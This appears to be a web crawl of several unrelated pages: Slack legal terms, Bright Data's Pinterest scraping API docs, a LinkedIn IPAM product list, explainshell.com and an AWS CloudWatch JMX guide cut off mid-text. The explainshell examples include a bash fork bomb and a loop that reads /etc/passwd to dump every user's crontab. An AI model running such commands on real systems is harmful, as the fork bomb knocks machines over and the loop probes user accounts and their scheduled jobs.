under the CCPA, please visit Slack’s California Consumer Privacy Act (CCPA) FAQ . Data Protection Authority Subject to applicable law, you also have the right to (i) restrict Slack’s use of Other Information that constitutes your Personal Data and (ii) lodge a complaint with your local data protection authority. If, however, you believe that we have not been able to assist with your complaint or concern, and you are located in the European Economic Area or the United Kingdom, you have the right to lodge a complaint with the competent supervisory authority. If you work or reside in a country that is a member of the European Union or that is in the EEA, you may find the contact details for your appropriate data protection authority on the following website . If you are a resident of the United Kingdom you may contact the UK supervisory authority, the Information Commissioner’s Office . Contacting Slack Please also feel free to contact Slack if you have any questions about this Privacy Policy or Slack’s practices, or if you are seeking to exercise any of your statutory rights. Slack will respond within a reasonable timeframe. You may contact us at privacy@slack.com or at our mailing address below: For Customers and Authorized Users who use Workspaces established for Customers in the US and Canada: Slack Technologies, LLC 50 Fremont Street San Francisco, CA, 94105 United States or For Customers and Authorized Users who use Workspaces established for Customers outside the US and Canada: Slack Technologies Limited Salesforce Tower 60 R801, North Dock Dublin Ireland esc Try Slack with your team for free Get started Change Region Selecting a different region will change the language and content of slack.com. Americas Latinoamérica (español) Brasil (português) United States (English) Europe Deutschland (Deutsch) España (español) France (français) Italia (italiano) United Kingdom (English) Asia Pacific 简体中文 繁體中文 India (English) 日本 (日本語) 대한민국 (한국어) Change Region Product Product Watch Demo Pricing Paid vs. Free Accessibility Featured Releases Changelog Status Why Slack? Why Slack? Slack vs. Email Slack vs. Teams Enterprise Small Business Productivity Task Management Scale Trust Features Features Channels Slack Connect Workflow Builder Messaging Huddles Canvas Lists Clips Apps & Integrations File Sharing Slack AI Agentforce Enterprise Search Security Enterprise Key Management Slack Atlas See all features Solutions Solutions Engineering IT Customer Service Sales Project Management Marketing Security Manufacturing, Auto & Energy Technology Media Financial Services Retail Public Sector Education Health & Life Sciences See all solutions Resources Resources Help Center What’s New Resources Library Slack Blog Community Customer Stories Events Developers Partners Partner Offers Slack Marketplace Slack Certified Company Company About Us News Media Kit Brand Center Careers Swag Store Engineering Blog Design Blog Contact Us Download Slack Privacy Terms Cookie Preferences Your Privacy Choices ©2026 Slack Technologies, LLC, a Salesforce company. All rights reserved. Various trademarks held by their respective owners. | 2026-01-13T09:29:26 |
https://docs.brightdata.com/api-reference/web-scraper-api/social-media-apis/pinterest#overview | Pinterest API Scrapers - Bright Data Docs Skip to main content Bright Data Docs home page English Search... ⌘ K Support Sign up Sign up Search... Navigation Social Media APIs Pinterest API Scrapers Welcome Proxy Infrastructure Web Access APIs Data Feeds AI API Reference General Integrations Overview Authentication Terminology Postman collection Python SDK JavaScript SDK Products Unlocker API SERP API Marketplace Dataset API Web Scraper API POST Asynchronous Requests POST Synchronous Requests POST Crawl API Delivery APIs Management APIs Social Media APIs Overview Facebook Instagram LinkedIn TikTok Reddit Twitter Pinterest Quora Vimeo YouTube Scraper Studio API Scraping Shield Proxy Networks Proxy Manager Unlocker & SERP API Deep Lookup API (Beta) Administrative API Account Management API On this page Overview Profiles API Collect by URL Discover by Keywords Posts API Collect by URL Discover by Profile URL Discover by Keywords Social Media APIs Pinterest API Scrapers Copy page Copy page Overview The Pinterest API Suite offers multiple types of APIs, each designed for specific data collection needs from Pinterest. Below is an overview of how these APIs connect and interact, based on the available features: Profiles API This API allows users to collect profile details based on a single input: profile URL. Discovery functionality : Discover by Keywords. Interesting Columns : name , following_count , website , follower_count . Posts API This API allows users to collect multiple posts based on a single input. Discovery functionality : - Discover by profile URL. - Discover by Keywords. Interesting Columns : title , content , user_name , likes . Profiles API Collect by URL This API allows users to retrieve detailed Pinterest profile information using the provided profile URL. Input Parameters : URL string required The Pinterest profile URL. Output Structure : Includes comprehensive data points: Profile Details : url , profile_picture , name , nickname , website , bio , country_code , profile_id . For all data points, click here . Engagement & Metrics : following_count , follower_count , boards_num , saved . Additional Information : last_updated , posts_page_url , discovery_input . This API allows users to collect detailed insights into a Pinterest profile, including user statistics, engagement metrics, and profile information. Discover by Keywords This API allows users to discover Pinterest profiles based on a specified keyword. Input Parameters : keyword string required The keyword to search for profiles. Output Structure : Includes comprehensive data points: Profile Details : url , profile_picture , name , nickname , website , bio , country_code , profile_id . For all data points, click here . Engagement & Metric s: following_count , follower_count , boards_num , saved. Additional Information : last_updated , posts_page_url , discovery_input . This API enables users to find Pinterest profiles related to a specific keyword, offering insights into user statistics, engagement, and profile details. Posts API Collect by URL This API allows users to collect detailed post data from a specific Pinterest post using the provided post URL. Input Parameters : URL string required The Pinterest post URL. Output Structure : Includes comprehensive data points: Post Details : url , post_id , title , content , date_posted , post_type . For all data points, click here . User Details : user_name , user_url , user_id , followers . Post Metrics : likes , comments_num , comments , categories . Media & Attachments : image_video_url , video_length , attached_files . Hashtags & Discovery : hashtags , discovery_input . This API allows users to retrieve detailed insights into a specific Pinterest post, including user engagement, post content, media, and other related information. Discover by Profile URL This API allows users to retrieve posts from a specific Pinterest profile based on the provided profile URL. Input Parameters : URL string required The Pinterest profile URL from which to collect posts. num_of_posts number The number of posts to collect. If omitted, there is no limit. posts_to_not_include array An array of post IDs to exclude from the results. start_date string Start date for filtering posts in MM-DD-YYYY format (should be earlier than end_date ). end_date string End date for filtering posts in MM-DD-YYYY format (should be later than start_date ). Output Structure : Includes comprehensive data points: Post Details : url , post_id , title , content , date_posted , user_name , user_url , user_id , followers , likes , categories , source , attached_files , image_video_url , video_length , hashtags , comments_num , comments , post_type . For all data points, click here . Engagement & Metrics : followers , likes , comments_num . Media & Attachments : image_video_url , video_length , attached_files . Additional Information : discovery_input . This API enables users tso collect posts from a specific Pinterest profile, allowing for filtering by date, exclusion of specific posts, and retrieval of detailed post data including media, comments, and engagement metrics. Discover by Keywords This API allows users to discover Pinterest posts based on a specific keyword, enabling efficient content discovery. Input Parameters : keyword string required The keyword to search for posts, such as “food” or any other relevant term. Output Structure : Includes comprehensive data points: Post Details : url , post_id , title , content , date_posted , user_name , user_url , user_id , followers , likes , categories , source , attached_files , image_video_url , video_length , hashtags , comments_num , comments , post_type . For all data points, click here . Engagement & Metrics : followers , likes , comments_num . Media & Attachments : image_video_url , video_length , attached_files . Additional Information : discovery_input . This API enables users to search for Pinterest posts based on a specific keyword, providing detailed insights into the content, engagement, media, and associated metrics for efficient discovery. Was this page helpful? Yes No Twitter Quora ⌘ I linkedin youtube github Powered by | 2026-01-13T09:29:26 |
https://www.linkedin.com/products/categories/ip-address-management-software?trk=products_details_guest_similar_products_section_similar_products_section_product_link_result-card_subtitle-click | Best IP Address Management (IPAM) Software | Products | LinkedIn Skip to main content LinkedIn Expand search This button displays the currently selected search type. When expanded it provides a list of search options that will switch the search inputs to match the current selection. Jobs People Learning Clear text Clear text Clear text Clear text Clear text Join now Sign in Clear text Used by Used by Network Engineer (2) Information Technology Administrator (2) Network Specialist (2) Information Technology Network Administrator (1) Information Technology Operations Analyst (1) See all products Find top products in IP Address Management (IPAM) Software category Software used to plan and manage the use of IP addresses on a network. - Use unique IP addresses for applications, devices, and related resources - Prevent conflicts and errors with automated audits and network discovery - Use IPv4/IPv6 support and integrate with DNS and DHCP services - View subnet capacity and optimize IP planning space 9 results Next-Gen IPAM IP Address Management (IPAM) Software by IPXO Next-Gen IPAM is designed to simplify and automate public IP resource management. It supports both IPv4 and IPv6, and is built with a focus on automation, transparency, and security. You get a centralized view of IP reputation, WHOIS data, RPKI validation, BGP routing, and geolocation – all in one automated platform. View product AX DHCP | IP Address Management (IPAM) Software IP Address Management (IPAM) Software by Axiros AX DHCP server is a clusterable carrier-grade DHCP / IPAM (IP Address Management) solution that can be seamlessly integrated within given provisioning platforms. AX DHCP copes with FttH, ONT provisioning, VOIP and IPTV services. Telecommunications carriers and internet service providers (ISPs) need powerful and robust infrastructure that supports future workloads. DDI (DNS-DHCP-IPAM) is a critical networking technology for every service provider that ensures customer services availability, security and performance. View product Tidal LightMesh IP Address Management (IPAM) Software by Tidal Go beyond IP Address Management (IPAM) with LightMesh from Tidal. Simplify and automate the administration and management of internet protocol networks. LightMesh makes IP visibility and operation scalable, secure and self-controlled with a central feature-rich interface, reducing complexity, and – all for free. Currently in Public Beta. View product ManageEngine OpUtils IP Address Management (IPAM) Software by ManageEngine ITOM OpUtils is an IP address and switch port management software that is geared towards helping engineers efficiently monitor, diagnose, and troubleshoot IT resources. OpUtils complements existing management tools by providing troubleshooting and real-time monitoring capabilities. It helps network engineers manage their switches and IP address space with ease. With a comprehensive set of over 20 tools, this switch port management tool helps with network monitoring tasks like detecting a rogue device intrusion, keeping an eye on bandwidth usage, monitoring the availability of critical devices, backing up Cisco configuration files, and more. View product Numerus IP Address Management (IPAM) Software by TechNarts-Nart Bilişim Numerus, a mega-scale enterprise-level IP address management tool, helps simplify and automate several tasks related to IP space management. It can manage IP ranges, pools, and VLANs, monitor the hierarchy, manage utilizations and capacities, perform automated IP address assignments, and report assignments to registries with regular synchronization. It provides extensive reporting capabilities and data for 3rd party systems with various integrations. For ISPs, it also provides global IP Registry integrations such as RIPE. View product Find products trusted by professionals in your network See which products are used by connections in your network and those that share similar job titles Sign in to view full insights dedicated datacenter proxies IP Address Management (IPAM) Software by Decodo You can now own IP addresses that are solely yours! SOCKS5 and HTTP(S) proxies that no one else can lay their hands on when you’re using them. View product AX DHCP | Gerenciamento de endereços IP IP Address Management (IPAM) Software by Axiros LATAM O AX DHCP é uma solução DHCP/IPAM que pode ser integrada de forma transparente em determinadas plataformas de provisionamento como FTTH, ONT, VOIP e IPTV. As operadoras de telecomunicações e os provedores de serviços de Internet precisam de uma infraestrutura poderosa e robusta que suporte cargas de trabalho futuras. DDI (DNS-DHCP-IPAM) é uma tecnologia de rede crítica para provedores de serviços que garante a disponibilidade, segurança e desempenho dos serviços ao cliente. … AX DHCP es una solución DHCP/IPAM que se puede integrar perfectamente en determinadas plataformas de aprovisionamiento como FTTH, ONT, VOIP e IPTV. Los operadores de telecomunicaciones y los proveedores de servicios de Internet necesitan una infraestructura potente y robusta para admitir futuras cargas de trabajo. DDI (DNS-DHCP-IPAM) es una tecnología de red fundamental para proveedores de servicios que garantiza la disponibilidad, la seguridad y el rendimiento de los servicios al cliente. View product Cygna runIP Appliance Platform IP Address Management (IPAM) Software by Cygna Labs Deutschland Maximizing the benefits of your DDI-Solution VitalQIP (Nokia) | DiamondIP (BT DiamondIP) | Micetro (Men & Mice) By providing an efficient solution for roll-out, configuration, patching and upgrades of DNS and DHCP servers, the runIP Management Platform optimizes the efficiency and value of your DDI investment. To create runIP, N3K combined the experience gained from setting up thousands of DNS & DHCP servers and hundreds of DDI environments into one holistic solution. runIP is suitable both for those companies that want to further reduce the operating costs of their existing DDI installation and for those that want to make their initial installation or further roll-out even more efficient and successful. The runIP solution is completed by its integrated, comprehensive real-time monitoring of the DNS and DHCP services and operating system and extensive long-term statistics. This ensures that you always have an overview of the DNS and DHCP services as well as the operating system. View product See more How it works Explore Discover the best product for your need from a growing catalog of 25,000 products and categories trusted by LinkedIn professionals Learn Evaluate new tools, explore trending products in your industry and see who in your network is skilled in the product Grow Join communities of product users to learn best practices, celebrate your progress and accelerate your career LinkedIn © 2026 About Accessibility User Agreement Privacy Policy Cookie Policy Copyright Policy Brand Policy Guest Controls Community Guidelines English Language | 2026-01-13T09:29:26 |
https://explainshell.com/ | explainshell.com - match command-line arguments to their help text explain shell . com about theme Light Dark write down a command-line to see the help text that matches each argument try showthedocs for explaining other languages EXPLAIN examples :(){ :|:& };: for user in $(cut -f1 -d: /etc/passwd); do crontab -u $user -l 2>/dev/null; done file=$(echo `basename "$file"`) true && { echo success; } || { echo failed; } cut -d ' ' -f 1 /var/log/apache2/access_logs | uniq -c | sort -n tar zcf - some-dir | ssh some-server "cd /; tar xvzf -" tar xzvf archive.tar.gz find . -type f -print0 ssh -i keyfile -f -N -L 1234:www.google.com:80 host git log --graph --abbrev-commit --pretty=oneline origin..mybranch | 2026-01-13T09:29:26 |
https://slack.com/terms-of-service/user | User Terms of Service | Legal | Slack Skip to main content Features COLLABORATION Channels Organize teams and work Slack Connect Work with external partners Messaging Chat with your team Huddles Meet with audio and video Clips Record and share updates CRM Salesforce in Slack Bring Salesforce into the flow of work PROJECT MANAGEMENT Templates Start any task, fast Canvas Create rich, flexible docs Lists Organize, track and manage projects File Sharing Bring files to the flow of work PLATFORM Agentic Platform Customize, extend, and unify your tech stack in Slack Apps & Integrations Connect your tools with Slack Workflow Builder Automate everyday tasks INTELLIGENCE AI in Slack Save time and work smarter with powerfully simple AI Agentforce Empower your whole team with AI-powered agents in Slack Enterprise Search Find anything, all from a single search bar ADMIN & SECURITY Security Protect data, ensure compliance Enterprise Key Management Monitor and revoke access Slack Atlas Discover rich profiles and org charts Watch demo Download Slack Slack Marketplace Find new agents and apps that fit your team’s needs. Browse marketplace What is Slack? Slack vs. Email Accessibility Solutions BY DEPARTMENT Engineering IT Customer Service Sales Project Management Marketing Human Resources Security BY INDUSTRY Manufacturing, Auto & Energy Technology Media Small Business Financial Services Retail Education Health & Life Sciences Watch demo Download Slack See all solutions TEMPLATE GALLERY Start work faster with pre-made templates for every task. See all templates Task Management Scale Engagement Trust Enterprise Resources Resources Library What’s New Product Tour Events Developers Partners Customer Stories Community Slack Certified Blog Slack Marketplace Watch demo Download Slack FEATURED Tips and tricks on getting started with Slack Get started Help Center Customer Support Pricing Search Sign in Request a demo Get started Get started Back Features COLLABORATION Channels Organize teams and work Slack Connect Work with external partners Messaging Chat with your team Huddles Meet with audio and video Clips Record and share updates CRM Salesforce in Slack Bring Salesforce into the flow of work PROJECT MANAGEMENT Templates Start any task, fast Canvas Create rich, flexible docs Lists Organize, track and manage projects File Sharing Bring files to the flow of work PLATFORM Agentic Platform Customize, extend, and unify your tech stack in Slack Apps & Integrations Connect your tools with Slack Workflow Builder Automate everyday tasks INTELLIGENCE AI in Slack Save time and work smarter with powerfully simple AI Agentforce Empower your whole team with AI-powered agents in Slack Enterprise Search Find anything, all from a single search bar ADMIN & SECURITY Security Protect data, ensure compliance Enterprise Key Management Monitor and revoke access Slack Atlas Discover rich profiles and org charts Watch demo Download Slack Slack Marketplace Find new agents and apps that fit your team’s needs. Browse marketplace What is Slack? Slack vs. Email Accessibility Solutions BY DEPARTMENT Engineering IT Customer Service Sales Project Management Marketing Human Resources Security BY INDUSTRY Manufacturing, Auto & Energy Technology Media Small Business Financial Services Retail Education Health & Life Sciences Watch demo Download Slack See all solutions TEMPLATE GALLERY Start work faster with pre-made templates for every task. See all templates Task Management Scale Engagement Trust Enterprise Resources Resources Library What’s New Product Tour Events Developers Partners Customer Stories Community Slack Certified Blog Slack Marketplace Watch demo Download Slack FEATURED Tips and tricks on getting started with Slack Get started Help Center Customer Support Pricing Sign in Request a demo Download Slack Close Navigation Close Navigation User Terms of Service Legal navigation Additional Terms Pages Close Legal Navigation Getting started Overview Terms Terms Main Services Agreement User Terms of Service Slack Supplemental Terms API Terms of Service Slack Marketplace Agreement Slack Partner Program Terms & Conditions Slack Developer Program Agreement Slack Brand Terms of Service Policies Policies Acceptable Use Policy Slack Subprocessors Slack Affiliates DMCA Policy Multi-year Accessibility Plan Security Security Security Practices Report a Vulnerability Slack Community Slack Community Slack Community Forum Terms of Service Archives Archives Terms & Policy Archives Effective Date: February 17, 2023 These User Terms of Service (the “ User Terms ”) govern your access and use of our online workplace productivity tools and platform (the “ Services ”). Please read them carefully. Even though you are signing onto an existing workspace, these User Terms apply to you as a user of the Services. We are grateful you’re here. First things First These User Terms are Legally Binding These User Terms are a legally binding contract between you and us. As part of these User Terms, you agree to comply with the most recent version of our Acceptable Use Policy , which is incorporated by reference into these User Terms. If you access or use the Services, or continue accessing or using the Services after being notified of a change to the User Terms or the Acceptable Use Policy , you confirm that you have read, understand and agree to be bound by the User Terms and the Acceptable Use Policy . “We”, “our” and “us” currently refers to the applicable Slack entity in the Contract (defined below). Customer’s Choices and Instructions You are an Authorized User on a Workspace Controlled by a “Customer” An organization or other third party that we refer to in these User Terms as “Customer” has invited you to a workspace (i.e., a unique domain where a group of users may access the Services, as further described in our Help Center pages). If you are joining one of your employer’s workspaces, for example, Customer is your employer. If you are joining a workspace created by your friend using her personal email address to work on her new startup idea, she is our Customer and she is authorizing you to join her workspace. What This Means for You—and for Us Customer has separately agreed to our Customer Terms of Service or entered into a written agreement with us or our affiliate(s) (in either case, the “ Contract ”) that permitted Customer to create and configure a workspace so that you and others could join (each invitee granted access to the Services, including you, is an “ Authorized User ”). The Contract contains our commitment to deliver the Services to Customer, who may then invite Authorized Users to join its workspace(s). When an Authorized User (including, you) submits content or information to the Services, such as messages or files (“ Customer Data ”), you acknowledge and agree that the Customer Data is owned by Customer and the Contract provides Customer with many choices and control over that Customer Data. For example, Customer may provision or deprovision access to the Services, enable or disable third party integrations, manage permissions, retention and export settings, transfer or assign workspaces, share channels, or consolidate your workspace or channels with other workspaces or channels, and these choices and instructions may result in the access, use, disclosure, modification or deletion of certain or all Customer Data. Please check out our Help Center pages for more detail on our different Service plans and the options available to Customer. The Relationship Between You, Customer and Us AS BETWEEN US AND CUSTOMER, YOU AGREE THAT IT IS SOLELY CUSTOMER’S RESPONSIBILITY TO (A) INFORM YOU AND ANY AUTHORIZED USERS OF ANY RELEVANT CUSTOMER POLICIES AND PRACTICES AND ANY SETTINGS THAT MAY IMPACT THE PROCESSING OF CUSTOMER DATA; (B) OBTAIN ANY RIGHTS, PERMISSIONS OR CONSENTS FROM YOU AND ANY AUTHORIZED USERS THAT ARE NECESSARY FOR THE LAWFUL USE OF CUSTOMER DATA AND THE OPERATION OF THE SERVICES; (C) ENSURE THAT THE TRANSFER AND PROCESSING OF CUSTOMER DATA UNDER THE CONTRACT IS LAWFUL; AND (D) RESPOND TO AND RESOLVE ANY DISPUTE WITH YOU AND ANY AUTHORIZED USER RELATING TO OR BASED ON CUSTOMER DATA, THE SERVICES OR CUSTOMER’S FAILURE TO FULFILL THESE OBLIGATIONS. SLACK MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND, WHETHER EXPRESS OR IMPLIED, TO YOU RELATING TO THE SERVICES, WHICH ARE PROVIDED TO YOU ON AN “AS IS” AND “ AS AVAILABLE” BASIS. A Few Ground Rules You Must be Over the Legal Age To the extent prohibited by applicable law, the Services are not intended for and should not be used by (a) anyone under the age of sixteen or (b) anyone under the applicable age of majority according to the data protection laws and regulations in your jurisdiction. You represent that you are over the legal age and are the intended recipient of Customer’s invitation to the Services. You may not access or use the Services for any purpose if either of the representations in the preceding sentence is not true. Without limiting the foregoing, you must be of legal working age. While You Are Here, You Must Follow the Rules To help ensure a safe and productive work environment, all Authorized Users must comply with our Acceptable Use Policy and any applicable policies established by Customer. If you see inappropriate behavior or content, please report it to your Primary Owner or employer. You Are Here At the Pleasure of Customer (and Us) These User Terms remain effective until Customer’s subscription for you expires or terminates, or your access to the Services has been terminated by Customer or us. Please contact Customer if you at any time or for any reason wish to terminate your account, including due to a disagreement with any updates to these User Terms or the Acceptable Use Policy . Limitation of Liability If we believe that there is a violation of the Contract, User Terms, the Acceptable Use Policy, or any of our other policies that can simply be remedied by Customer’s removal of certain Customer Data or taking other action, we will, in most cases, ask Customer to take action rather than intervene. We may directly step in and take what we determine to be appropriate action (including disabling your account) if Customer does not take appropriate action or we believe there is a credible risk of harm to us, the Services, Authorized Users, or any third parties. IN NO EVENT WILL YOU OR WE HAVE ANY LIABILITY TO THE OTHER FOR ANY LOST PROFITS OR REVENUES OR FOR ANY INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL, COVER OR PUNITIVE DAMAGES HOWEVER CAUSED, WHETHER IN CONTRACT, TORT OR UNDER ANY OTHER THEORY OF LIABILITY, AND WHETHER OR NOT THE PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. UNLESS YOU ARE ALSO A CUSTOMER (AND WITHOUT LIMITATION TO OUR RIGHTS AND REMEDIES UNDER THE CONTRACT), YOU WILL HAVE NO FINANCIAL LIABILITY TO US FOR A BREACH OF THESE USER TERMS. OUR MAXIMUM AGGREGATE LIABILITY TO YOU FOR ANY BREACH OF THE USER TERMS IS ONE HUNDRED DOLLARS ($100) IN THE AGGREGATE. THE FOREGOING DISCLAIMERS WILL NOT APPLY TO THE EXTENT PROHIBITED BY APPLICABLE LAW AND DO NOT LIMIT EITHER PARTY’S RIGHT TO SEEK AND OBTAIN EQUITABLE RELIEF. Application of Consumer Law Slack is a workplace tool intended for use by businesses and organizations and not for consumer purposes. To the maximum extent permitted by law, you hereby acknowledge and agree that consumer laws do not apply. If however any consumer laws (e.g., in Australia, the Competition and Consumer Act 2010 (Cth)) do apply and cannot otherwise be lawfully excluded, nothing in these User Terms will restrict, exclude or modify any statutory warranties, guarantees, rights or remedies you have, and our liability is limited (at our option) to the replacement, repair or resupply of the Services or the pro-rata refund to Customer of pre-paid fees for your subscription covering the remainder of the term. Survival The sections titled “The Relationship Between You, Customer, and Us,” “Limitation of Liability,” and “Survival,” and all of the provisions under the general heading “General Provisions” will survive any termination or expiration of the User Terms. General Provisions Email and Slack Messages Except as otherwise set forth herein, all notices under the User Terms will be by email, although we may instead choose to provide notice to Authorized Users through the Services (e.g., a slackbot notification). Notices to Slack should be sent to feedback@slack.com , except for legal notices, which must be sent to legal@slack.com . A notice will be deemed to have been duly given (a) the day after it is sent, in the case of a notice sent through email; and (b) the same day, in the case of a notice sent through the Services. Notices under the Contract will be delivered solely to Customer in accordance with the terms of that agreement. Privacy Policy Please review our Privacy Policy for more information on how we collect and use data relating to the use and performance of our products. Modifications As our business evolves, we may change these User Terms or the Acceptable Use Policy . If we make a material change to the User Terms or the Acceptable Use Policy , we will provide you with reasonable notice prior to the change taking effect either by emailing the email address associated with your account or by messaging you through the Services. You can review the most current version of the User Terms at any time by visiting this page, and by visiting the following for the most current versions of the other pages that are referenced in these User Terms: Acceptable Use Policy and Privacy Policy . Any material revisions to these User Terms will become effective on the date set forth in our notice, and all other changes will become effective on the date we publish the change. If you use the Services after the effective date of any changes, that use will constitute your acceptance of the revised terms and conditions. Waiver No failure or delay by either party in exercising any right under the User Terms, including the Acceptable Use Policy , will constitute a waiver of that right. No waiver under the User Terms will be effective unless made in writing and signed by an authorized representative of the party being deemed to have granted the waiver. Severability The User Terms, including the Acceptable Use Policy , will be enforced to the fullest extent permitted under applicable law. If any provision of the User Terms is held by a court of competent jurisdiction to be contrary to law, the provision will be modified by the court and interpreted so as best to accomplish the objectives of the original provision to the fullest extent permitted by law, and the remaining provisions of the User Terms will remain in effect. Assignment You may not assign any of your rights or delegate your obligations under these User Terms, including the Acceptable Use Policy , whether by operation of law or otherwise, without the prior written consent of us (not to be unreasonably withheld). We may assign these User Terms in their entirety (including all terms and conditions incorporated herein by reference), without your consent, to a corporate affiliate or in connection with a merger, acquisition, corporate reorganization, or sale of all or substantially all of our assets. Governing Law; Venue; Fees The User Terms, including the Acceptable Use Policy , and any disputes arising out of or related hereto, will be governed exclusively by the same applicable governing law of the Contract, without regard to conflicts of laws rules or the United Nations Convention on the International Sale of Goods. The courts located in the applicable venue of the Contract will have exclusive jurisdiction to adjudicate any dispute arising out of or relating to the User Terms, including the Acceptable Use Policy , or its formation, interpretation or enforcement. Each party hereby consents and submits to the exclusive jurisdiction of such courts. In any action or proceeding to enforce rights under the User Terms, the prevailing party will be entitled to recover its reasonable costs and attorney’s fees. Entire Agreement The User Terms, including any terms incorporated by reference into the User Terms, constitute the entire agreement between you and us and supersede all prior and contemporaneous agreements, proposals or representations, written or oral, concerning its subject matter. To the extent of any conflict or inconsistency between the provisions in these User Terms and any pages referenced in these User Terms, the terms of these User Terms will first prevail; provided, however, that if there is a conflict or inconsistency between the Contract and the User Terms, the terms of the Contract will first prevail, followed by the provisions in these User Terms, and then followed by the pages referenced in these User Terms (e.g., the Privacy Policy). Customer will be responsible for notifying Authorized Users of those conflicts or inconsistencies and until such time the terms set forth herein will be binding. Contacting Slack Please also feel free to contact us if you have any questions about Slack’s User Terms of Service. You may contact us at feedback@slack.com or at our mailing address below: For Customers and Authorized Users who use Workspaces established for Customers in the US and Canada: Slack Technologies Salesforce Tower, 415 Mission Street, 3rd Floor, San Francisco, CA 94105 USA For Customers and Authorized Users who use Workspaces established for Customers outside the US and Canada: Slack Technologies Limited Salesforce Tower 60 R801, North Dock Dublin Ireland esc Try Slack with your team for free Get started Change Region Selecting a different region will change the language and content of slack.com. Americas Latinoamérica (español) Brasil (português) United States (English) Europe Deutschland (Deutsch) España (español) France (français) Italia (italiano) United Kingdom (English) Asia Pacific 简体中文 繁體中文 India (English) 日本 (日本語) 대한민국 (한국어) Change Region Product Product Watch Demo Pricing Paid vs. Free Accessibility Featured Releases Changelog Status Why Slack? Why Slack? Slack vs. Email Slack vs. Teams Enterprise Small Business Productivity Task Management Scale Trust Features Features Channels Slack Connect Workflow Builder Messaging Huddles Canvas Lists Clips Apps & Integrations File Sharing Slack AI Agentforce Enterprise Search Security Enterprise Key Management Slack Atlas See all features Solutions Solutions Engineering IT Customer Service Sales Project Management Marketing Security Manufacturing, Auto & Energy Technology Media Financial Services Retail Public Sector Education Health & Life Sciences See all solutions Resources Resources Help Center What’s New Resources Library Slack Blog Community Customer Stories Events Developers Partners Partner Offers Slack Marketplace Slack Certified Company Company About Us News Media Kit Brand Center Careers Swag Store Engineering Blog Design Blog Contact Us Download Slack Privacy Terms Cookie Preferences Your Privacy Choices ©2026 Slack Technologies, LLC, a Salesforce company. All rights reserved. Various trademarks held by their respective owners. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/pt_br/AmazonCloudWatch/latest/monitoring/CloudWatch-Agent-JMX-metrics.html | Coletar métricas do Java Management Extensions (JMX) - Amazon CloudWatch Coletar métricas do Java Management Extensions (JMX) - Amazon CloudWatch Documentação Amazon CloudWatch Guia do usuário Coletar métricas da JVM Coletar métricas do Kafka Coleta métricas do Tomcat Coletar métricas do Java Management Extensions (JMX) Você pode usar o agente do CloudWatch para coletar métricas do Java Management Extensions (JMX) das aplicações Java. O agente do CloudWatch é compatível com a coleta dessas métricas nas seguintes versões: JVM 8 e posteriores Kafka 0.8.2.x e posteriores Tomcat 9, 10.1 e 11 (beta) Amazon EC2 Para habilitar o JMX na instância da JVM Para que o agente do CloudWatch possa coletar métricas do JMX, a JVM da aplicação deve se vincular a uma porta usando a propriedade com.sun.management.jmxremote.port do sistema. java -Dcom.sun.management.jmxremote.port= port-number -jar example.jar Para obter mais informações e outras configurações, consulte a documentação do JMX . Amazon EKS Para habilitar o JMX nos pods de aplicações Java Ao usar o complemento CloudWatch Observability EKS, você pode gerenciar como as métricas do JMX são habilitadas com anotações. Para obter mais informações, consulte Instalação do agente do CloudWatch com o complemento de observabilidade do EKS do Amazon CloudWatch ou com o chart do Helm . Para habilitar a coleta de métricas do JMX de uma workload, adicione as seguintes anotações ao arquivo de manifesto da workload na seção PodTemplate : instrumentation.opentelemetry.io/inject-java: "true" Um ou mais itens a seguir: Para métricas da JVM: cloudwatch.aws.amazon.com/inject-jmx-jvm: "true" Para métricas do operador do Kafka: cloudwatch.aws.amazon.com/inject-jmx-kafka: "true" Para métricas de consumo do Kafka: cloudwatch.aws.amazon.com/inject-jmx-kafka-consumer: "true" Para métricas de produtores do Kafka: cloudwatch.aws.amazon.com/inject-jmx-kafka-producer: "true" Para métricas do Tomcat: cloudwatch.aws.amazon.com/inject-jmx-tomcat: "true" Para começar a coletar métricas do JMX, adicione uma seção jmx à seção metrics_collected do arquivo de configuração do agente do CloudWatch. A seção jmx pode conter os campos a seguir. jvm : opcional. Especifica que você deseja recuperar métricas da Java Virtual Machine (JVM) na instância. Para obter mais informações, consulte Coletar métricas da JVM . A seção pode incluir os seguintes campos: measurement : especifica a matriz de métricas da JVM a serem coletadas. Para obter uma lista dos valores de uso possíveis, consulte a coluna Metric (Métrica) na tabela em Coletar métricas da JVM . Na entrada de cada métrica individual, você também poderá especificar uma ou ambas das seguintes opções: rename : especifica um nome diferente para essa métrica. unit : especifica a unidade a ser usada para essa métrica, substituindo a unidade padrão para a métrica. A unidade que você especificar deverá ser uma unidade de métrica válida do CloudWatch, conforme listado na descrição do Unit em MetricDatum . kafka : opcional. Especifica que você deseja recuperar métricas do operador do Apache Kafka na instância. Para obter mais informações, consulte Coletar métricas do Kafka . A seção pode incluir os seguintes campos: measurement : especifica a matriz de métricas do operador do Kafka a serem coletadas. Para obter uma lista dos valores de uso possíveis, consulte a coluna Métrica na primeira tabela em Coletar métricas do Kafka . Na entrada de cada métrica individual, você também poderá especificar uma ou ambas das seguintes opções: rename : especifica um nome diferente para essa métrica. unit : especifica a unidade a ser usada para essa métrica, substituindo a unidade padrão para a métrica. A unidade que você especificar deverá ser uma unidade de métrica válida do CloudWatch, conforme listado na descrição do Unit em MetricDatum . kafka-consumer : opcional. Especifica que você deseja recuperar métricas dos consumidores do Apache Kafka na instância. Para obter mais informações, consulte Coletar métricas do Kafka . A seção pode incluir os seguintes campos: measurement : especifica a matriz de métricas do operador do Kafka a serem coletadas. Para obter uma lista dos valores de uso possíveis, consulte a coluna Métrica na segunda tabela de métricas em Coletar métricas do Kafka . Na entrada de cada métrica individual, você também poderá especificar uma ou ambas das seguintes opções: rename : especifica um nome diferente para essa métrica. unit : especifica a unidade a ser usada para essa métrica, substituindo a unidade padrão para a métrica. A unidade que você especificar deverá ser uma unidade de métrica válida do CloudWatch, conforme listado na descrição do Unit em MetricDatum . kafka-producer : opcional. Especifica que você deseja recuperar métricas dos produtores do Apache Kafka na instância. Para obter mais informações, consulte Coletar métricas do Kafka . A seção pode incluir os seguintes campos: measurement : especifica a matriz de métricas do operador do Kafka a serem coletadas. Para obter uma lista dos valores de uso possíveis, consulte a coluna Métrica na terceira tabela de métricas em Coletar métricas do Kafka . Na entrada de cada métrica individual, você também poderá especificar uma ou ambas das seguintes opções: rename : especifica um nome 